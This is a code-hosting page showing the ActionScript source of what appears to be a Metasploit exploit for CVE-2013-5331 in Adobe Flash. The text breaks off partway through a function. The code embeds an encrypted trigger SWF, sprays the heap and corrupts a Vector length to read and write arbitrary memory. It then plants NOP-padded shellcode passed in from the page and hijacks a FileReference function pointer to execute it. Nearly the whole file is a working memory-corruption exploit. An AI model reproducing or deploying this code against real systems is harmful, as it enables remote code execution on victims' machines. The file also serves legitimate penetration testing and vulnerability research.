PageRenderTime 46ms CodeModel.GetById 3ms app.highlight 34ms RepoModel.GetById 1ms app.codeStats 1ms

/external/source/exploits/CVE-2013-5331/Exploit.as

https://github.com/Jonono2/metasploit-framework
ActionScript | 897 lines | 452 code | 40 blank | 405 comment | 71 complexity | df9b2d0d09317aed1f29a436f2f389ba MD5 | raw file
  1//Compile:  mxmlc.exe Exploit.as -o Exploit.swf
  2
  3package
  4{
  5	import flash.display.Sprite;
  6	import flash.utils.ByteArray;
  7	import flash.net.LocalConnection;
  8	import flash.utils.Endian;
  9	import flash.net.FileReference;
 10	import __AS3__.vec.Vector;
 11	import flash.system.Capabilities;
 12	import flash.display.Loader;
 13	import flash.utils.setTimeout;
 14	
 15	import flash.display.LoaderInfo;
 16			
 17	public class Exploit extends Sprite
 18	{
 19		var number_massage_vectors:uint = 0x18000;		
 20		var len_massage_vector:uint = 0x36;		
 21		var maxElementsPerPage:uint = 0xe00012;		
 22		var massage_array:Array;		
 23		var tweaked_vector;
 24		var tweaked_vector_address;	
 25		var done:Boolean = false;		
 26		var receiver:LocalConnection;	
 27		// Embedded trigger, ActionScript source available at the end of this file as code comment.		
 28		var trigger_swf:String = "78da75565f4c9357144ff6b2cca7252ed91e966d2e2c35e0a605bc681d9f11a94f4b85745b05b2f0325c78d3651ad0173666d8941998a2d9f857a0aed8de425b4a59a1a520855908f4cf6de1d2967e03d9a2885127713a37d8b9f7fba0b0cc872fdc9eef777ee79cdf39dfb9343c2b0bf75c43d48cb36a08de5f41f07bb3e4b682128c1a435abf62b93b3f49f0a027fc15ea27e3c52ebd0fb9fbc5230e7b14fdd84f4b5c1db775d88e0b6c5e8abcce91125a3d52ea34f2df5a931e7f6ed3278a5d567f89c743cfba3a964a1d467f3eb5b5a0c1fea1bc25122872b8936a6a1f3a62b58bc864a7a57d7a5ce8edc5451686bb9cd4b9fbfdc7f0e5a1a2ee86d162ec4ca281c171d4e81e2a32b54ce699fa2327781c327ff4823159ea74b420b3939e6a68c067dbaa68becd33f122d5fbf35a2f2fa1ceb691bc3e63f4888724b58039eb218f0a1dee299d83dc2b7342dc2e27fea09d4ce69bc8bd7c13d466230b877b6d90437b5c6b3246510f19d675d68fe6f5da132c87f25e3bf09b71890be2eac944e160ad5c8b63a2a046aea7d7398c1cce1b857800170f905f8b06ec43a7fa3c37b403c6d1222799542f7947746ee74d84ddf7caee1251ebecc3fa0962406204231ae9449498b3a10fc26c40954de35d159a1016e25575fa3562c8146718a67b1da39c857e892166b3fcc7ef3af74b56b1334ed744b012fa898261ab3e460cca2bea2e148caf6dd30c612114c1e06746c0a58ca530d91c1304cc0a16c2525e7ba98c11c32c6617b3e5d0ad7e59dc2fbac6ce077d6a3312a3808d5bd2593e6233cbc750b6a8ee43416af6bf02be7497168904fb6904e68e983381ef8b45750f0a8a12f7ec7a3cc643d8b3099334fb19e6278659fe3f4c2d0ace5d47c104d7660f259da7d97b7191e5df0838c3011fcb57e4b9e7fad42e24ae6ee1c94d696ae69ade845e10625024898ca9572925fd0d399c2bb2c0b8d22edc673e1eae3dab2138c463bc7ddec7eced29fb18b7bf25d937eb34c8e3059a55efd0b843f9183410ef1864dd0dbb792cff6aa566060b237157fa28fbbdd1bb4ee89de15d5f93ea008d5bf75039d7e0d472868662616ca3be3a86dfe9535f871ed422da38688e9126c4e2fa78cdf674cd08e6feeee80b521fe23da7af32fe49f0abb675c7c8ab7ea845188bdc7c0edfb9ad7c707ed2a4ca84b330165065d108d444ee661c0ae11505e3fdc390c96b7bb89021d5e67d5e6dc0f19d90e0bc172b4699fd8141c17dff045f88f32ca07a5ffea6d013822b65db3e1ae9009ba9fce1b3e5375ca70e71bb3fc0f8be81f7b7f40962d81e9c9366e2ca14b39f17a6791c3dc46943c11593ac1f16462fd9d83cecdc9887fba93a57b9cfd71575c3ca6c3a8f19dfcb3cbf49ebe67385661a2b15e01bd9d0e56fa647b5426d84f71bb1784d639cf35bceffa079314d1dc2a729e359b1cadac3f9b17ce673743e5df25bd0cf810e945854ad5be3d42b980fd40b75e706a995eb31cdf5d00b11d003b8f6f998be49f85ef84c9d4bcdd4d3e56d0cbf1650e5d2788db0c2f793e14d9ec7eaea0ea9871ee8a143de1b96f5bd2148bd815e32ecc4ea0ebaeb1ae3cde1dccbedbbf9398ccb6baa273feab14f68cdffa476be62ae19701654d08a0fd2da89e23edb64316d8996e1b6d163de795cd2661d2ea0ec91ee844d7781a8c575f327a8c39fd7d8b2847ea85ad3e2ea645167c390ceabe73d423c9ff042dab8a60b6d27f20e851a673f69473484f70e13aca3640afd4554aad4aee8cc8e7f39a04f92ce9c6048de05c18533a5619c73959d09ef490edf8f33d652d0257316f634bccf0e80b689b061cfc7090c7bb8eb751a1e3ecaeebc6922ef04d0303e63a9bc2ae19487a759bc36fe5d49bba9bbe2f726952069db25506eb3f0fd31d7ccf613ef89f09b0ffb432cdf10cff9a5e971f80bf169eda3e32eeb2f3aaf537cadc1b40677ec8dc23b44bbef0ef42b46d2ced0182ef77a473e747937ddb183517667b347d29c24f2fb8c23796d1d7e761f9f6c6dc0851ee3dd932d70d75e70d2e32677e284c33ea1a69bb51866fbe1335e879cf3cfd304f209f6226ac7f0bfc745a411f1c6ac2542dd9f06d426a641b6bc0ff65e69cd8019b9b5b96fec9ce9eb87f99db140fdf03e3400b30d7d89bebd9fcd4cec29cee935c1fd4ddad7358459efce9c6dba25e12239592c5e94a47672bcf9fb4a4d5cdad9b1f5796896ef5ad8e571f62dc4eb77d04b90ebbffc1db134";
 29		var key:uint = 3.627461843E9;
 30		var shellcodeObj:Array;
 31		
 32		public function Exploit() {
 33			var trigger_decrypted:uint = 0;
 34			super();			
 35			shellcodeObj = LoaderInfo(this.root.loaderInfo).parameters.sh.split(",");			
 36			var i:* = 0;
 37			this.massage_array = new Array();
 38			
 39			// Memory massage 
 40			i = 0;
 41			while(i < this.number_massage_vectors)
 42			{
 43				this.massage_array[i] = new Vector.<int>(1);
 44				i++;
 45			}
 46			i = 0;
 47			while(i < this.number_massage_vectors)
 48			{
 49				this.massage_array[i] = new Vector.<int>(this.len_massage_vector);
 50				this.massage_array[i][0] = 0x41414141;
 51				i++;
 52			}
 53			var j:* = 0;
 54			i = 0;
 55			while(i < this.number_massage_vectors)
 56			{
 57				j = 0;
 58				while(j < 32)
 59				{
 60					this.massage_array[i][j] = 0x41414141;
 61					j++;
 62				}
 63				i++;
 64			}
 65			var k:uint = (4096 - 32) / (this.len_massage_vector * 4 + 8);
 66			i = 65536 + 6;
 67			while(i < this.number_massage_vectors)
 68			{
 69				this.massage_array[i] = new Vector.<int>(this.len_massage_vector * 2);
 70				this.massage_array[i][0] = 0x42424242;
 71				i = i + k;
 72			}
 73			
 74			// Decompress/Decrypt trigger
 75			this.receiver = new LocalConnection();
 76			this.receiver.connect("toAS3");
 77			this.receiver.client = this;
 78			var trigger_byte_array:ByteArray = this.createByteArray(this.trigger_swf);
 79			trigger_byte_array.endian = Endian.LITTLE_ENDIAN;
 80			trigger_byte_array.uncompress();
 81			trigger_byte_array.position = 0;
 82			i = 0;
 83			while(i < trigger_byte_array.length / 4)
 84			{
 85				trigger_decrypted = trigger_byte_array.readUnsignedInt() ^ this.key;
 86				trigger_byte_array.position = trigger_byte_array.position - 4;
 87				trigger_byte_array.writeUnsignedInt(trigger_decrypted);
 88				i++;
 89			}
 90			trigger_byte_array.position = 0;
 91			
 92			// Trigger corruption
 93			var trigger_loader:Loader = new Loader();
 94			trigger_loader.loadBytes(trigger_byte_array);
 95			
 96			// Handler to check for corruption
 97			setTimeout(this.as2loaded,4000,[]);
 98		}
 99		
100		function createByteArray(hex_string:String) : ByteArray {
101			var byte:String = null;
102			var byte_array:ByteArray = new ByteArray();
103			var hex_string_length:uint = hex_string.length;
104			var i:uint = 0;
105			while(i < hex_string_length)
106			{
107				byte = hex_string.charAt(i) + hex_string.charAt(i + 1);
108				byte_array.writeByte(parseInt(byte,16));
109				i = i + 2;
110			}
111			return byte_array;
112		}
113		
114		// When param1.length > 0 it's called from the corruption trigger
115		// Else it's called because of the timeout trigger
116		public function as2loaded(param1:Array) : * {
117			var back_offset:* = undefined; // backward offset from the tweaked vector
118			var j:* = undefined;
119			var _loc15_:uint = 0;
120			var ninbets:Array = null;
121			var array_with_code:Array = null;
122			var address_code:uint = 0;
123			var _loc19_:uint = 0;
124			if(this.done == true)
125			{
126				return;
127			}			
128			if(param1.length > 0)
129			{
130				this.done = true;
131			}			
132			var corrupted_index:uint = 0;
133			var i:* = 0;
134			i = 0x10000 + 6;
135			
136			// Search corrupted vector
137			while(i < this.number_massage_vectors)
138			{
139				if(this.massage_array[i].length != 2 * this.len_massage_vector)
140				{
141					if(this.massage_array[i].length != this.len_massage_vector)
142					{
143						corrupted_index = i;
144						this.massage_array[i][0] = 0x41424344;
145						break;
146					}
147				}
148				i++;
149			}
150			
151			// throw Error if any vector has been corrupted
152			if(i == this.number_massage_vectors)
153			{
154				throw new Error("not found");
155			}			
156			else // start the magic...
157			{
158				// Tweak the length for the vector next to the corrupted one
159				this.massage_array[corrupted_index][this.len_massage_vector] = 0x40000001; 
160				// Save the reference to the tweaked vector, it'll work with this one to leak and corrupt arbitrary memory
161				this.tweaked_vector = this.massage_array[corrupted_index + 1]; 
162				var offset_length = 0;
163				// Ensure tweaked vector length corruption, I guess the offset to the vector length
164				// changes between flash versions
165				if(this.tweaked_vector.length != 0x40000001)
166				{
167					this.massage_array[corrupted_index][this.len_massage_vector + 10] = 0x40000001;
168					offset_length = 10;
169				}				
170				if(param1.length > 0) // From the corruption trigger
171				{
172					// Fix the massage array of vectors, restores the corrupted vector and
173					// marks it as the last one.
174					back_offset = (4 * (this.len_massage_vector + 2) - 100) / 4 + this.len_massage_vector + 2; // 87
175					j = 0;
176					/*
177					tweaked_vector->prior->prior, some data is overwritten, is used for search purposes
178					tweaked_vector[3fffffa7] = 0
179					tweaked_vector[3fffffa8] = 0
180					tweaked_vector[3fffffa9] = 1c0340
181					tweaked_vector[3fffffaa] = ffffffff
182					tweaked_vector[3fffffab] = 0
183					tweaked_vector[3fffffac] = 0
184					tweaked_vector[3fffffad] = 0
185					tweaked_vector[3fffffae] = 0
186					tweaked_vector[3fffffaf] = 0
187					tweaked_vector[3fffffb0] = 0
188					tweaked_vector[3fffffb1] = 0
189					tweaked_vector[3fffffb2] = 100
190					tweaked_vector[3fffffb3] = 0
191					tweaked_vector[3fffffb4] = 0
192					tweaked_vector[3fffffb5] = 0
193					tweaked_vector[3fffffb6] = 0
194					tweaked_vector[3fffffb7] = 100dddce
195					tweaked_vector[3fffffb8] = 0
196					tweaked_vector[3fffffb9] = 1df6000
197					tweaked_vector[3fffffba] = 1dc2380
198					tweaked_vector[3fffffbb] = 0
199					tweaked_vector[3fffffbc] = 10000
200					tweaked_vector[3fffffbd] = 70
201					tweaked_vector[3fffffbe] = 0
202					tweaked_vector[3fffffbf] = 4
203					tweaked_vector[3fffffc0] = 0
204					tweaked_vector[3fffffc1] = 1de7090
205					tweaked_vector[3fffffc2] = 4
206					tweaked_vector[3fffffc3] = 0
207					tweaked_vector[3fffffc4] = 0
208					tweaked_vector[3fffffc5] = 0
209					// tweaked_vector->prior
210					tweaked_vector[3fffffc6] = 36 // Length
211					tweaked_vector[3fffffc7] = 1dea000
212					tweaked_vector[3fffffc8] = 41414141
213					tweaked_vector[3fffffc9] = 41414141
214					tweaked_vector[3fffffca] = 41414141
215					tweaked_vector[3fffffcb] = 41414141
216					tweaked_vector[3fffffcc] = 41414141
217					tweaked_vector[3fffffcd] = 41414141
218					tweaked_vector[3fffffce] = 41414141
219					tweaked_vector[3fffffcf] = 41414141
220					tweaked_vector[3fffffd0] = 41414141
221					tweaked_vector[3fffffd1] = 41414141
222					tweaked_vector[3fffffd2] = 41414141
223					tweaked_vector[3fffffd3] = 41414141
224					tweaked_vector[3fffffd4] = 41414141
225					tweaked_vector[3fffffd5] = 41414141
226					tweaked_vector[3fffffd6] = 41414141
227					tweaked_vector[3fffffd7] = 41414141
228					tweaked_vector[3fffffd8] = 41414141
229					tweaked_vector[3fffffd9] = 41414141
230					tweaked_vector[3fffffda] = 41414141
231					tweaked_vector[3fffffdb] = 41414141
232					tweaked_vector[3fffffdc] = 41414141
233					tweaked_vector[3fffffdd] = 41414141
234					tweaked_vector[3fffffde] = 41414141
235					tweaked_vector[3fffffdf] = 41414141
236					tweaked_vector[3fffffe0] = 41414141
237					tweaked_vector[3fffffe1] = 41414141
238					tweaked_vector[3fffffe2] = 41414141
239					tweaked_vector[3fffffe3] = 41414141
240					tweaked_vector[3fffffe4] = 41414141
241					tweaked_vector[3fffffe5] = 41414141
242					tweaked_vector[3fffffe6] = 41414141
243					tweaked_vector[3fffffe7] = 41414141
244					tweaked_vector[3fffffe8] = 0
245					tweaked_vector[3fffffe9] = 0
246					tweaked_vector[3fffffea] = 0
247					tweaked_vector[3fffffeb] = 0
248					tweaked_vector[3fffffec] = 0
249					tweaked_vector[3fffffed] = 0
250					tweaked_vector[3fffffee] = 0
251					tweaked_vector[3fffffef] = 0
252					tweaked_vector[3ffffff0] = 0
253					tweaked_vector[3ffffff1] = 0
254					tweaked_vector[3ffffff2] = 0
255					tweaked_vector[3ffffff3] = 0
256					tweaked_vector[3ffffff4] = 0
257					tweaked_vector[3ffffff5] = 0
258					tweaked_vector[3ffffff6] = 0
259					tweaked_vector[3ffffff7] = 0
260					tweaked_vector[3ffffff8] = 0
261					tweaked_vector[3ffffff9] = 0
262					tweaked_vector[3ffffffa] = 0
263					tweaked_vector[3ffffffb] = 0
264					tweaked_vector[3ffffffc] = 0
265					tweaked_vector[3ffffffd] = 0
266					*/
267					while(j < back_offset)
268					{
269						this.tweaked_vector[0x40000000 - back_offset - 2 + j - offset_length] = param1[j];
270						j++;
271					}
272					// tweaked_vector[3fffffff] = 1dea000 // Restores tweaked vector metadata
273					this.tweaked_vector[0x40000000-1] = param1[back_offset + 1];
274					
275					
276					j = back_offset + 2;
277					
278					// Modifies the tweaked vector content, and overflow the next ones, they just remain in good state:
279					/*
280					// tweaked vector content
281					tweaked_vector[0] = 41414141
282					tweaked_vector[1] = 41414141
283					tweaked_vector[2] = 41414141
284					tweaked_vector[3] = 41414141
285					tweaked_vector[4] = 41414141
286					tweaked_vector[5] = 41414141
287					tweaked_vector[6] = 41414141
288					tweaked_vector[7] = 41414141
289					tweaked_vector[8] = 41414141
290					tweaked_vector[9] = 41414141
291					tweaked_vector[a] = 41414141
292					tweaked_vector[b] = 41414141
293					tweaked_vector[c] = 41414141
294					tweaked_vector[d] = 41414141
295					tweaked_vector[e] = 41414141
296					tweaked_vector[f] = 41414141
297					tweaked_vector[10] = 41414141
298					tweaked_vector[11] = 41414141
299					tweaked_vector[12] = 41414141
300					tweaked_vector[13] = 41414141
301					tweaked_vector[14] = 41414141
302					tweaked_vector[15] = 41414141
303					tweaked_vector[16] = 41414141
304					tweaked_vector[17] = 41414141
305					tweaked_vector[18] = 41414141
306					tweaked_vector[19] = 41414141
307					tweaked_vector[1a] = 41414141
308					tweaked_vector[1b] = 41414141
309					tweaked_vector[1c] = 41414141
310					tweaked_vector[1d] = 41414141
311					tweaked_vector[1e] = 41414141
312					tweaked_vector[1f] = 41414141
313					tweaked_vector[20] = 0
314					tweaked_vector[21] = 0
315					tweaked_vector[22] = 0
316					tweaked_vector[23] = 0
317					tweaked_vector[24] = 0
318					tweaked_vector[25] = 0
319					tweaked_vector[26] = 0
320					tweaked_vector[27] = 0
321					tweaked_vector[28] = 0
322					tweaked_vector[29] = 0
323					tweaked_vector[2a] = 0
324					tweaked_vector[2b] = 0
325					tweaked_vector[2c] = 0
326					tweaked_vector[2d] = 0
327					tweaked_vector[2e] = 0
328					tweaked_vector[2f] = 0
329					tweaked_vector[30] = 0
330					tweaked_vector[31] = 0
331					tweaked_vector[32] = 0
332					tweaked_vector[33] = 0
333					tweaked_vector[34] = 0
334					tweaked_vector[35] = 0
335					// next to the tweaked vector
336					tweaked_vector[36] = 36
337					tweaked_vector[37] = 1dea000
338					tweaked_vector[38] = 41414141
339					tweaked_vector[39] = 41414141
340					tweaked_vector[3a] = 41414141
341					tweaked_vector[3b] = 41414141
342					tweaked_vector[3c] = 41414141
343					tweaked_vector[3d] = 41414141
344					tweaked_vector[3e] = 41414141
345					tweaked_vector[3f] = 41414141
346					tweaked_vector[40] = 41414141
347					tweaked_vector[41] = 41414141
348					tweaked_vector[42] = 41414141
349					tweaked_vector[43] = 41414141
350					tweaked_vector[44] = 41414141
351					tweaked_vector[45] = 41414141
352					tweaked_vector[46] = 41414141
353					tweaked_vector[47] = 41414141
354					tweaked_vector[48] = 41414141
355					tweaked_vector[49] = 41414141
356					tweaked_vector[4a] = 41414141
357					tweaked_vector[4b] = 41414141
358					tweaked_vector[4c] = 41414141
359					tweaked_vector[4d] = 41414141
360					tweaked_vector[4e] = 41414141
361					tweaked_vector[4f] = 41414141
362					tweaked_vector[50] = 41414141
363					tweaked_vector[51] = 41414141
364					tweaked_vector[52] = 41414141
365					tweaked_vector[53] = 41414141
366					tweaked_vector[54] = 41414141
367					tweaked_vector[55] = 41414141
368					tweaked_vector[56] = 41414141
369					tweaked_vector[57] = 41414141
370					tweaked_vector[58] = 0
371					tweaked_vector[59] = 0
372					tweaked_vector[5a] = 0
373					tweaked_vector[5b] = 0
374					tweaked_vector[5c] = 0
375					tweaked_vector[5d] = 0
376					tweaked_vector[5e] = 0
377					tweaked_vector[5f] = 0
378					tweaked_vector[60] = 0
379					tweaked_vector[61] = 0
380					tweaked_vector[62] = 0
381					tweaked_vector[63] = 0
382					tweaked_vector[64] = 0
383					tweaked_vector[65] = 0
384					tweaked_vector[66] = 0
385					tweaked_vector[67] = 0
386					tweaked_vector[68] = 0
387					tweaked_vector[69] = 0
388					tweaked_vector[6a] = 0
389					tweaked_vector[6b] = 0
390					tweaked_vector[6c] = 0
391					tweaked_vector[6d] = 0
392					// next -> next to the tweaked vector
393					tweaked_vector[6e] = 36
394					tweaked_vector[6f] = 1dea000
395					tweaked_vector[70] = 41414141
396					tweaked_vector[71] = 41414141
397					tweaked_vector[72] = 41414141
398					tweaked_vector[73] = 41414141
399					tweaked_vector[74] = 41414141
400					tweaked_vector[75] = 41414141
401					tweaked_vector[76] = 41414141
402					tweaked_vector[77] = 41414141
403					tweaked_vector[78] = 41414141
404					tweaked_vector[79] = 41414141
405					tweaked_vector[7a] = 41414141
406					tweaked_vector[7b] = 41414141
407					tweaked_vector[7c] = 41414141
408					tweaked_vector[7d] = 41414141
409					tweaked_vector[7e] = 41414141
410					tweaked_vector[7f] = 41414141
411					tweaked_vector[80] = 41414141
412					tweaked_vector[81] = 41414141
413					tweaked_vector[82] = 41414141
414					tweaked_vector[83] = 41414141
415					tweaked_vector[84] = 41414141
416					tweaked_vector[85] = 41414141
417					tweaked_vector[86] = 41414141
418					tweaked_vector[87] = 41414141
419					tweaked_vector[88] = 41414141
420					tweaked_vector[89] = 41414141
421					tweaked_vector[8a] = 41414141
422					tweaked_vector[8b] = 41414141
423					tweaked_vector[8c] = 41414141
424					tweaked_vector[8d] = 41414141
425					tweaked_vector[8e] = 41414141
426					tweaked_vector[8f] = 41414141
427					tweaked_vector[90] = 0
428					tweaked_vector[91] = 0
429					tweaked_vector[92] = 0
430					tweaked_vector[93] = 0
431					tweaked_vector[94] = 0
432					tweaked_vector[95] = 0
433					tweaked_vector[96] = 0
434					tweaked_vector[97] = 0
435					tweaked_vector[98] = 0
436					tweaked_vector[99] = 0
437					tweaked_vector[9a] = 0
438					tweaked_vector[9b] = 0
439					tweaked_vector[9c] = 0
440					tweaked_vector[9d] = 0
441					tweaked_vector[9e] = 0
442					tweaked_vector[9f] = 0
443					tweaked_vector[a0] = 0
444					tweaked_vector[a1] = 0
445					tweaked_vector[a2] = 0
446					tweaked_vector[a3] = 0
447					tweaked_vector[a4] = 0
448					tweaked_vector[a5] = 0
449					*/					
450					while(j < param1.length)
451					{						
452						this.tweaked_vector[j - (back_offset + 2) + offset_length] = param1[j];
453						j++;
454					}
455					// next -> next to the tweaked vector
456					// tweaked_vector[a6] = 36					
457					// tweaked_vector[a7] = 1dea000
458					this.tweaked_vector[2 * (this.len_massage_vector + 2) + this.len_massage_vector + offset_length] = param1[back_offset]; // [166] => 36
459					this.tweaked_vector[2 * (this.len_massage_vector + 2) + this.len_massage_vector + 1 + offset_length] = param1[back_offset + 1]; //[167] => 1dea000
460				}
461				else // From the Timeout trigger; never reached on my tests.
462				{
463					_loc15_ = this.tweaked_vector[4 * (this.len_massage_vector + 2)-1];
464					this.tweaked_vector[0x3fffffff] = _loc15_;
465					this.tweaked_vector[0x3fffffff - this.len_massage_vector - 2] = _loc15_;
466					this.tweaked_vector[0x3fffffff - this.len_massage_vector - 3] = this.len_massage_vector;
467					this.tweaked_vector[this.len_massage_vector + 1] = _loc15_;
468					this.tweaked_vector[2 * (this.len_massage_vector + 2)-1] = _loc15_;
469					this.tweaked_vector[3 * (this.len_massage_vector + 2)-1] = _loc15_;
470					this.tweaked_vector[this.len_massage_vector] = this.len_massage_vector;
471					this.tweaked_vector[2 * (this.len_massage_vector + 2) - 2] = this.len_massage_vector;
472					this.tweaked_vector[3 * (this.len_massage_vector + 2) - 2] = this.len_massage_vector;
473				}
474				
475				this.massage_array[corrupted_index].length = 256; // :?
476				
477				// Search backwards to find the massage array metadata
478				// It's used to disclose the tweaked vector address
479				i = 0;
480				var hint = 0;
481				while(true)
482				{
483					hint = this.tweaked_vector[0x40000000 - i];
484					if(hint == this.maxElementsPerPage-1) //  0xe00012 - 1
485					{
486						break;
487					}
488					i++;
489				}
490				
491				this.tweaked_vector_address = 0; 
492				if(this.tweaked_vector[0x40000000 - i - 4] == 0)
493				{
494					throw new Error("error");
495				}
496				else
497				{
498					this.tweaked_vector_address = this.tweaked_vector[0x40000000 - i - 4] + (4 * this.len_massage_vector + 8) + 8 + 4 * offset_length;
499					
500					// I have not been able to understand this tweak,
501					// Maybe not necessary at all...
502					i = 0;
503					hint = 0;
504					while(true)
505					{
506						hint = this.tweaked_vector[0x40000000 - i];
507						if(hint == 0x7e3f0004)
508						{
509							break;
510						}
511						i++;
512					}
513					
514					this.tweaked_vector[0x40000000 - i + 1] = 4.294967295E9; // -1 / 0xffffffff					
515					// End of maybe not necessary tweak
516					
517					var file_ref_array = new Array();
518					i = 0;
519					while(i < 64)
520					{
521						file_ref_array[i] = new FileReference();
522						i++;
523					}
524					
525					var file_reference_address = this.getFileReferenceLocation(this.tweaked_vector, this.tweaked_vector_address);
526					var ptr_backup = this.getMemoryAt(this.tweaked_vector, this.tweaked_vector_address, file_reference_address + 32);
527					
528					// Get array related data, important to trigger the desired corruption to achieve command execution
529					ninbets = this.getNinbets(this.tweaked_vector,this.tweaked_vector_address); 
530					array_with_code = this.createCodeVectors(0x45454545, 0x90909090); 
531					address_code = this.getCodeAddress(this.tweaked_vector, this.tweaked_vector_address, 0x45454545);
532					this.fillCodeVectors(array_with_code, address_code);
533					this.tweaked_vector[7] = ninbets[0] + 0;
534					this.tweaked_vector[4] = ninbets[1];
535					this.tweaked_vector[0] = 4096;
536					this.tweaked_vector[1] = address_code & 0xfffff000;
537					// Corruption
538					this.writeMemoryAt(this.tweaked_vector, this.tweaked_vector_address, file_reference_address + 32, this.tweaked_vector_address + 8);
539					// Get arbitrary execution
540					i = 0;
541					while(i < 64)
542					{
543						file_ref_array[i].cancel();
544						i++;
545					}
546					this.tweaked_vector[7] = address_code;
547					i = 0;
548					while(i < 64)
549					{
550						file_ref_array[i].cancel();
551						i++;
552					}
553					// Restore Function Pointer
554					this.writeMemoryAt(this.tweaked_vector, this.tweaked_vector_address, file_reference_address + 32, ptr_backup);
555						
556					return;
557				}
558			}
559		}
560		
561		// vector: tweaked vector with 0x40000001 length
562		// vector_address: address of tweaked vector
563		// address: address to read
564		function getMemoryAt(vector:Vector.<int>, vector_address:uint, address:uint) : uint {
565			if(address >= vector_address)
566			{
567				return vector[(address - vector_address) / 4];
568			}
569			return vector[0x40000000 - (vector_address - address) / 4];
570		}
571		
572		// vector: tweaked vector with 0x40000001 length
573		// vector_address: address of tweaked vector
574		// address: address to write
575		// value: value to write
576		function writeMemoryAt(vector:Vector.<int>, vector_address:uint, address:uint, value:uint) : * {
577			if(address >= vector_address)
578			{
579				vector[(address - vector_address) / 4] = value;
580			}
581			else
582			{
583				vector[0x40000000 - (vector_address - address) / 4] = value;
584			}
585		}
586		
587		function getNinbets(vector:*, vector_address:*) : Array {
588			var _loc9_:uint = 0;
589			var array_related_addr:uint = this.getMemoryAt(vector,vector_address,(vector_address & 0xfffff000) + 0x1c);
590			var index_array_related_addr:uint = 0;
591			var _loc5_:uint = 0;
592			var _loc6_:uint = 0;
593			if(array_related_addr >= vector_address)
594			{
595				index_array_related_addr = (array_related_addr - vector_address) / 4;
596			}
597			else
598			{
599				index_array_related_addr = 0x40000000 - (vector_address - array_related_addr) / 4;
600			}
601			var _loc7_:uint = 0;
602			while(true)
603			{
604				index_array_related_addr--;
605				_loc9_ = vector[index_array_related_addr];
606				if(_loc9_ == 0xfff870ff)
607				{
608					_loc7_ = 2;
609					break;
610				}
611				if(_loc9_ == 0xf870ff01)
612				{
613					_loc7_ = 1;
614					break;
615				}
616				if(_loc9_ == 0x70ff016a) 
617				{
618					_loc9_ = vector[index_array_related_addr + 1];
619					if(_loc9_ == 0xfc70fff8)
620					{
621						_loc7_ = 0;
622						break;
623					}
624				}
625				else
626				{
627					if(_loc9_ == 0x70fff870)
628					{
629						_loc7_ = 3;
630						break;
631					}
632				}
633			}
634			
635			_loc5_ = vector_address + 4 * index_array_related_addr - _loc7_;
636			index_array_related_addr--;
637			var _loc8_:uint = vector[index_array_related_addr];
638			if(_loc8_ == 0x16a0424)
639			{
640				return [_loc5_,_loc6_];
641			}
642			if(_loc8_ == 0x6a042444)
643			{
644				return [_loc5_,_loc6_];
645			}
646			if(_loc8_ == 0x424448b)
647			{
648				return [_loc5_,_loc6_];
649			}
650			if(_loc8_ == 0xff016a04)
651			{
652				return [_loc5_,_loc6_];
653			}
654			
655			_loc6_ = _loc5_ - 6;
656			while(true)
657			{
658				index_array_related_addr--;
659				_loc9_ = vector[index_array_related_addr];
660				if(_loc9_ == 0x850ff50)
661				{
662					if(uint(vector[index_array_related_addr + 1]) == 0x5e0cc483)
663					{
664						_loc7_ = 0;
665						break;
666					}
667				}
668				_loc9_ = _loc9_ & 0xffffff00;
669				if(_loc9_ == 0x50ff5000)
670				{
671					if(uint(vector[index_array_related_addr + 1]) == 0xcc48308)
672					{
673						_loc7_ = 1;
674						break;
675					}
676				}
677				_loc9_ = _loc9_ & 0xffff0000;
678				if(_loc9_ == 0xff500000)
679				{
680					if(uint(vector[index_array_related_addr + 1]) == 0xc4830850)
681					{
682						if(uint(vector[index_array_related_addr + 2]) == 0xc35d5e0c)
683						{
684							_loc7_ = 2;
685							break;
686						}
687					}
688				}
689				_loc9_ = _loc9_ & 0xff000000;
690				if(_loc9_ == 0x50000000) 
691				{
692					if(uint(vector[index_array_related_addr + 1]) == 0x830850ff)
693					{
694						if(uint(vector[index_array_related_addr + 2]) == 0x5d5e0cc4)  
695						{
696							_loc7_ = 3;
697							break;
698						}
699					}
700				}
701			}
702			
703			_loc5_ = vector_address + 4 * index_array_related_addr + _loc7_;
704			return [_loc5_,_loc6_];
705		}
706		
707		// vector: tweaked vector with 0x40000001 length
708		// address: address of tweaked vector
709		function getFileReferenceLocation(vector:*, address:*) : uint {
710			var flash_address:uint = this.getMemoryAt(vector,address,(address & 0xfffff000) + 28);
711			var _loc4_:uint = 0;
712			while(true)
713			{
714				_loc4_ = this.getMemoryAt(vector,address,flash_address + 8);
715				if(_loc4_ == 0x2a0)
716				{
717					break;
718				}
719				if(_loc4_ < 0x2a0)
720				{
721					flash_address = flash_address + 36;
722				}
723				else
724				{
725					flash_address = flash_address - 36;
726				}
727			}
728			
729			var file_ref_related_addr:uint = this.getMemoryAt(vector,address,flash_address + 12);
730			while(this.getMemoryAt(vector,address, file_ref_related_addr + 384) != 0xffffffff)
731			{
732				if(this.getMemoryAt(vector,address, file_ref_related_addr + 380) == 0xffffffff)
733				{
734					break;
735				}
736				file_ref_related_addr = this.getMemoryAt(vector, address, file_ref_related_addr + 8);
737			}
738			return file_ref_related_addr;
739		}
740				
741		function getCodeAddress(vector:*, vector_addr:*, mark:*) : uint {
742			var vector_length_read:uint = 0;
743			var vector_code_info_addr:uint = this.getMemoryAt(vector, vector_addr,(vector_addr & 0xfffff000) + 0x1c);
744			while(true)
745			{
746				vector_length_read = this.getMemoryAt(vector, vector_addr, vector_code_info_addr + 8);
747				if(vector_length_read == 2032) // code vector length
748				{
749					break;
750				}
751				vector_code_info_addr = vector_code_info_addr + 0x24;
752			}
753			
754			var vector_code_contents_addr:uint = this.getMemoryAt(vector, vector_addr, vector_code_info_addr + 0xc);
755			while(this.getMemoryAt(vector, vector_addr, vector_code_contents_addr + 0x28) != mark)
756			{
757				vector_code_contents_addr = this.getMemoryAt(vector, vector_addr, vector_code_contents_addr + 8);
758			}
759			return vector_code_contents_addr + 0x2c; // Code address, starting at nops after the mark
760		}
761		
762		// Every vector in the array => 7f0 (header = 8; data => 0x7e8)
763		function createCodeVectors(mark:uint, nops:uint) : * {
764			var array:Array = new Array();
765			var i:* = 0;
766			while(i < 8)
767			{
768				array[i] = new Vector.<uint>(2032 / 4 - 8);
769				array[i][0] = mark;
770				array[i][1] = nops;
771				i++;
772			}
773			return array;
774		}
775		
776		function fillCodeVectors(param1:Array, param2:uint) : * {
777			var i:uint = 0;
778			var sh:uint=1;
779			
780			while(i < param1.length)
781			{				
782				for(var u:String in shellcodeObj)
783				{
